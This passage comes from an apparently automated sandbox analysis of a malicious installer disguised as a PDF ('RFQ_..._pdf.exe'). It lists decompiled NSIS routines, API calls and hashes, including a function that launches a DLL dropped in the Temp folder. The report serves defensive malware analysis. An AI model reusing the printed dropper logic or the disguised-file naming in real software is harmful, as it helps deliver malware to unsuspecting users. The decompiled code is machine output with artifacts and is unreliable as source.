                                                                        • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,000000DF,000000D0), ref: 0040169A
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,000000DF,000000D0), ref: 004016AF
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,000000DF,000000D0), ref: 004016B8
                                                                          • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ), ref: 00405CA2
                                                                          • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                          • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                          • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                          • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                          • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
                                                                          • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
                                                                          • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                                                          • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                          • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                          • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                          • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                          • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                          • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                        • MoveFileA.KERNEL32(?,?), ref: 004016C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                        • API String ID: 2621199633-1876267922
                                                                        • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                        • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                                                        • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                        • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404627(struct HWND__* _a4, intOrPtr _a8) {
                                                                        				long _v8;
                                                                        				signed char _v12;
                                                                        				unsigned int _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				long _v56;
                                                                        				void* _v60;
                                                                        				long _t15;
                                                                        				unsigned int _t19;
                                                                        				signed int _t25;
                                                                        				struct HWND__* _t28;
                                                                        
                                                                        				_t28 = _a4;
                                                                        				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                        				if(_a8 == 0) {
                                                                        					L4:
                                                                        					_v56 = _t15;
                                                                        					_v60 = 4;
                                                                        					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                        					return _v24;
                                                                        				}
                                                                        				_t19 = GetMessagePos();
                                                                        				_v16 = _t19 >> 0x10;
                                                                        				_v20 = _t19;
                                                                        				ScreenToClient(_t28,  &_v20);
                                                                        				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                        				if((_v12 & 0x00000066) != 0) {
                                                                        					_t15 = _v8;
                                                                        					goto L4;
                                                                        				}
                                                                        				return _t25 | 0xffffffff;
                                                                        			}














                                                                        0x00404635
                                                                        0x00404642
                                                                        0x00404648
                                                                        0x00404686
                                                                        0x00404686
                                                                        0x00404695
                                                                        0x0040469c
                                                                        0x00000000
                                                                        0x0040469e
                                                                        0x0040464a
                                                                        0x00404659
                                                                        0x00404661
                                                                        0x00404664
                                                                        0x00404676
                                                                        0x0040467c
                                                                        0x00404683
                                                                        0x00000000
                                                                        0x00404683
                                                                        0x00000000

                                                                        APIs
                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                                                        • GetMessagePos.USER32 ref: 0040464A
                                                                        • ScreenToClient.USER32 ref: 00404664
                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                        • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                                                        • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                        • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
                                                                        				int _t7;
                                                                        				int _t15;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_t16 = _a4;
                                                                        				if(_a8 == 0x110) {
                                                                        					SetTimer(_t16, 1, 0xfa, 0);
                                                                        					_a8 = 0x113;
                                                                        					 *0x40b020 = _a16;
                                                                        				}
                                                                        				if(_a8 == 0x113) {
                                                                        					_t15 =  *0x789930; // 0x36600
                                                                        					_t7 =  *0x79d938;
                                                                        					if(_t15 >= _t7) {
                                                                        						_t15 = _t7;
                                                                        					}
                                                                        					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
                                                                        					SetWindowTextA(_t16, 0x7898f0);
                                                                        					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
                                                                        					ShowWindow(_t16, 5);
                                                                        				}
                                                                        				return 0;
                                                                        			}






                                                                        0x00402bb7
                                                                        0x00402bbf
                                                                        0x00402bcb
                                                                        0x00402bd4
                                                                        0x00402bd7
                                                                        0x00402bd7
                                                                        0x00402bdf
                                                                        0x00402be1
                                                                        0x00402be7
                                                                        0x00402bee
                                                                        0x00402bf0
                                                                        0x00402bf0
                                                                        0x00402c09
                                                                        0x00402c14
                                                                        0x00402c21
                                                                        0x00402c29
                                                                        0x00402c29
                                                                        0x00402c34

                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                                        • MulDiv.KERNEL32(00036600,00000064,?), ref: 00402BF6
                                                                        • wsprintfA.USER32 ref: 00402C09
                                                                        • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                                                        • SetDlgItemTextA.USER32 ref: 00402C21
                                                                        • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: TextWindow$ItemShowTimerwsprintf
                                                                        • String ID:
                                                                        • API String ID: 559026099-0
                                                                        • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                        • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                                                        • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                        • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E00401E34() {
                                                                        				signed int _t7;
                                                                        				void* _t19;
                                                                        				char* _t20;
                                                                        				signed int _t24;
                                                                        				void* _t26;
                                                                        
                                                                        				_t24 = E00402A9A(_t19);
                                                                        				_t20 = E00402A9A(0x31);
                                                                        				_t7 = E00402A9A(0x22);
                                                                        				_push(_t20);
                                                                        				_push(_t24);
                                                                        				_t22 = _t7;
                                                                        				wsprintfA("C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll", "%s %s");
                                                                        				E00401428(0xffffffec);
                                                                        				asm("sbb eax, eax");
                                                                        				asm("sbb eax, eax");
                                                                        				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
                                                                        					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
                                                                        				return 0;
                                                                        			}








                                                                        0x00401e3c
                                                                        0x00401e45
                                                                        0x00401e47
                                                                        0x00401e4c
                                                                        0x00401e4d
                                                                        0x00401e58
                                                                        0x00401e5a
                                                                        0x00401e65
                                                                        0x00401e71
                                                                        0x00401e7f
                                                                        0x00401e91
                                                                        0x004026da
                                                                        0x004026da
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • wsprintfA.USER32 ref: 00401E5A
                                                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                        Strings
                                                                        • %s %s, xrefs: 00401E4E
                                                                        • C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll, xrefs: 00401E53
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ExecuteShellwsprintf
                                                                        • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                        • API String ID: 2956387742-3397750892
                                                                        • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                        • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                                                        • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                        • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				char _v272;
                                                                        				long _t14;
                                                                        
                                                                        				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
                                                                        				if(_t14 == 0) {
                                                                        					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                        						if(_a12 != 0) {
                                                                        							RegCloseKey(_v8);
                                                                        							return 1;
                                                                        						}
                                                                        						if(E00402ADA(_v8,  &_v272, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        					return RegDeleteKeyA(_a4, _a8);
                                                                        				}
                                                                        				return _t14;
                                                                        			}






                                                                        0x00402af5
                                                                        0x00402afd
                                                                        0x00402b25
                                                                        0x00402b0f
                                                                        0x00402b56
                                                                        0x00000000
                                                                        0x00402b5e
                                                                        0x00402b23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402b23
                                                                        0x00402b3a
                                                                        0x00000000
                                                                        0x00402b46
                                                                        0x00402b50

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                        • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                        • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                        • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401D32() {
                                                                        				void* _t18;
                                                                        				struct HINSTANCE__* _t22;
                                                                        				struct HWND__* _t25;
                                                                        				void* _t27;
                                                                        
                                                                        				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
                                                                        				GetClientRect(_t25, _t27 - 0x40);
                                                                        				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                        				if(_t18 != _t22) {
                                                                        					DeleteObject(_t18);
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
                                                                        				return 0;
                                                                        			}







                                                                        0x00401d3e
                                                                        0x00401d45
                                                                        0x00401d74
                                                                        0x00401d7c
                                                                        0x00401d83
                                                                        0x00401d83
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00401D38
                                                                        • GetClientRect.USER32 ref: 00401D45
                                                                        • LoadImageA.USER32 ref: 00401D66
                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                        • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                        • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                                                        • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                        • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 35%
                                                                        			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                        				char _v36;
                                                                        				char _v68;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t26;
                                                                        				void* _t34;
                                                                        				signed int _t36;
                                                                        				signed int _t39;
                                                                        				unsigned int _t46;
                                                                        
                                                                        				_t46 = _a12;
                                                                        				_push(0x14);
                                                                        				_pop(0);
                                                                        				_t34 = 0xffffffdc;
                                                                        				if(_t46 < 0x100000) {
                                                                        					_push(0xa);
                                                                        					_pop(0);
                                                                        					_t34 = 0xffffffdd;
                                                                        				}
                                                                        				if(_t46 < 0x400) {
                                                                        					_t34 = 0xffffffde;
                                                                        				}
                                                                        				if(_t46 < 0xffff3333) {
                                                                        					_t39 = 0x14;
                                                                        					asm("cdq");
                                                                        					_t46 = _t46 + 1 / _t39;
                                                                        				}
                                                                        				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                        				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
                                                                        				_t21 = _t46 & 0x00ffffff;
                                                                        				_t36 = 0xa;
                                                                        				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                        				_push(_t46 >> 0);
                                                                        				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
                                                                        				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
                                                                        				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
                                                                        			}













                                                                        0x0040454d
                                                                        0x00404551
                                                                        0x00404559
                                                                        0x0040455c
                                                                        0x0040455d
                                                                        0x0040455f
                                                                        0x00404561
                                                                        0x00404564
                                                                        0x00404564
                                                                        0x0040456b
                                                                        0x00404571
                                                                        0x00404571
                                                                        0x00404578
                                                                        0x00404583
                                                                        0x00404584
                                                                        0x00404587
                                                                        0x00404587
                                                                        0x00404594
                                                                        0x0040459f
                                                                        0x004045a2
                                                                        0x004045b4
                                                                        0x004045bb
                                                                        0x004045bc
                                                                        0x004045cb
                                                                        0x004045db
                                                                        0x004045f7

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                                                        • wsprintfA.USER32 ref: 004045DB
                                                                        • SetDlgItemTextA.USER32 ref: 004045EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                        • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                                                        • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                                                        • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E00401C19(void* __ecx) {
                                                                        				signed int _t30;
                                                                        				CHAR* _t33;
                                                                        				long _t34;
                                                                        				int _t39;
                                                                        				signed int _t40;
                                                                        				int _t44;
                                                                        				void* _t46;
                                                                        				int _t51;
                                                                        				struct HWND__* _t55;
                                                                        				void* _t58;
                                                                        
                                                                        				_t46 = __ecx;
                                                                        				 *(_t58 - 8) = E00402A9A(0x33);
                                                                        				 *(_t58 + 8) = E00402A9A(0x44);
                                                                        				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
                                                                        					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
                                                                        				}
                                                                        				__eflags =  *(_t58 - 0x10) & 0x00000002;
                                                                        				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
                                                                        					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
                                                                        				}
                                                                        				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
                                                                        				_push(1);
                                                                        				if(__eflags != 0) {
                                                                        					_t53 = E00402A9A();
                                                                        					_t30 = E00402A9A();
                                                                        					asm("sbb ecx, ecx");
                                                                        					asm("sbb eax, eax");
                                                                        					_t33 =  ~( *_t29) & _t53;
                                                                        					__eflags = _t33;
                                                                        					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
                                                                        					goto L10;
                                                                        				} else {
                                                                        					_t55 = E00402A7D();
                                                                        					_t39 = E00402A7D();
                                                                        					_t51 =  *(_t58 - 0x10) >> 2;
                                                                        					if(__eflags == 0) {
                                                                        						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
                                                                        						L10:
                                                                        						 *(_t58 - 0x34) = _t34;
                                                                        					} else {
                                                                        						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
                                                                        						asm("sbb eax, eax");
                                                                        						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
                                                                        					}
                                                                        				}
                                                                        				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
                                                                        				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
                                                                        					_push( *(_t58 - 0x34));
                                                                        					E0040591D();
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
                                                                        				return 0;
                                                                        			}













                                                                        0x00401c19
                                                                        0x00401c22
                                                                        0x00401c2e
                                                                        0x00401c31
                                                                        0x00401c3b
                                                                        0x00401c3b
                                                                        0x00401c3e
                                                                        0x00401c42
                                                                        0x00401c4c
                                                                        0x00401c4c
                                                                        0x00401c4f
                                                                        0x00401c53
                                                                        0x00401c55
                                                                        0x00401ca2
                                                                        0x00401ca4
                                                                        0x00401cad
                                                                        0x00401cb5
                                                                        0x00401cb8
                                                                        0x00401cb8
                                                                        0x00401cc1
                                                                        0x00000000
                                                                        0x00401c57
                                                                        0x00401c5e
                                                                        0x00401c60
                                                                        0x00401c68
                                                                        0x00401c6b
                                                                        0x00401c93
                                                                        0x00401cc7
                                                                        0x00401cc7
